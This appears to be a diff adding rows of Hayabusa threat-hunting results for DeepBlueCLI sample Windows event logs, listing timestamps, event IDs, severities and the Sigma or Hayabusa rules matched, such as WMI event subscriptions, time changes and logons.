+2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 08:45:09.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 09:34:55.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 09:37:57.755 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 09:44:32.677 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x16589,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-22 09:53:07.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 10:07:45.896 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 10:13:36.380 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 10:21:57.052 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 10:36:35.927 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-22 10:38:16.943 +09:00,IE8Win7,21,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:11.015 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:26.562 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:07:38.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:07:42.189 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7c0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0x2b7f0  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:08:08.126 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0x2b7c0,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:09:50.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:00.564 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:12.548 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-24 14:11:13.251 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.547 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:18:43.562 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:23:49.093 +09:00,IE8Win7,19,high,WMI Event Subscription,,rules/sigma/wmi_event/sysmon_wmi_event_subscription.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:25:02.877 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:48:26.739 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 02:57:33.848 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:01:39.454 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:02:36.847 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:05:21.128 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 03:05:40.910 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 03:08:12.894 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0x2b7f0,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:22.343 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IE8WIN7$  :  Target User: IEUser  :  IP Address: 127.0.0.1  :  Process: C:\Windows\System32\winlogon.exe  :  Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf564  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,informational,Logon Type 2 - Interactive,User: IEUser  :  Workstation: IE8WIN7  :  IP Address: 127.0.0.1  :  Port: 0  :  LogonID: 0xcf598  :  (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,informational,Admin Logon,User: IEUser  :  LogonID: 0xcf564,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:55:06.000 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 06:57:07.814 +09:00,IE8Win7,9,medium,Raw Disk Access Using Illegitimate Tools,,rules/sigma/raw_access_thread/sysmon_raw_disk_access_using_illegitimate_tools.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.107 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,informational,Explicit Logon,Source User: IEUser  :  Target User: rdavis  :  IP Address: -  :  Process:   :  Target Server: HYPERV.sharplogic.local,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,informational,Logoff - User Initiated,User: IEUser  :  LogonID: 0xcf598,rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:14.156 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
+2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,Failed Logon From Public IP,,rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Not Existing File,,rules/sigma/process_creation/process_creation_susp_image_missing.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,1,high,Execution Of Other File Type Than .exe,,rules/sigma/process_creation/process_creation_susp_non_exe_image.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
+2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
